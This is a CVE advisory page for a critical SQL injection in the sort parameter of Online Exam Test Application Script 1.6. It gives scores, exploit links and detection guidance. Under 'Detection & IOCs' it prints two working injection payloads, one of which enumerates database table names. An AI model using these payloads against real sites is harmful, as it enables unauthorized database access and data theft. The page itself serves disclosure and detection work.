CVE-2017-17622
published 2017-12-13CVE-2017-17622: Online Exam Test Application Script 1.6 has SQL Injection via the exams.php sort parameter.
PriorityP259critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.62%
88.1th percentile
Online Exam Test Application Script 1.6 has SQL Injection via the exams.php sort parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| online_exam_test_application_script_project | online_exam_test_application_script | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://server/exams.php?sort=-4++UNION+ALL+SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6--+-↗
commandsort=4 UNION ALL SELECT NULL,CONCAT(0x717a6b7071,0x436a5574724b7477565147546d496b47534c4e586c4275794c6359695374477874484b4669767978,0x7176627871),NULL,NULL,NULL,NULL-- Knya↗
- →Monitor GET requests to exams.php where the 'sort' parameter contains SQL injection patterns such as UNION, SELECT, AND with numeric comparisons, or comment sequences (--+-). ↗
- →Detect boolean-based blind SQLi attempts in the 'sort' parameter matching the pattern: sort=<integer> AND <integer>=<integer> ↗
- →Detect UNION-based SQLi attempts in the 'sort' parameter; specifically look for UNION ALL SELECT with NULL columns and CONCAT with hex-encoded strings (0x71...) targeting a 6-column result set. ↗
- →Flag requests to exams.php containing INFORMATION_SCHEMA.TABLES references in the sort parameter, indicative of schema enumeration via SQL injection. ↗
- ·The exploit was tested on specific platforms only; behavior may differ on other OS/web server configurations. ↗
- ·The vulnerable parameter is delivered via HTTP GET, making it visible in web server access logs and easier to detect via WAF or log analysis. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
https://packetstormsecurity.com/files/145329/Online-Exam-Test-Application-Script-1.6-SQL-Injection.htmlhttps://packetstormsecurity.com/files/145334/Online-Exam-Test-Application-Script-1.6-SQL-Injection.htmlhttps://www.exploit-db.com/exploits/43291/https://packetstormsecurity.com/files/145329/Online-Exam-Test-Application-Script-1.6-SQL-Injection.htmlhttps://packetstormsecurity.com/files/145334/Online-Exam-Test-Application-Script-1.6-SQL-Injection.htmlhttps://www.exploit-db.com/exploits/43291/
2017-12-13
Published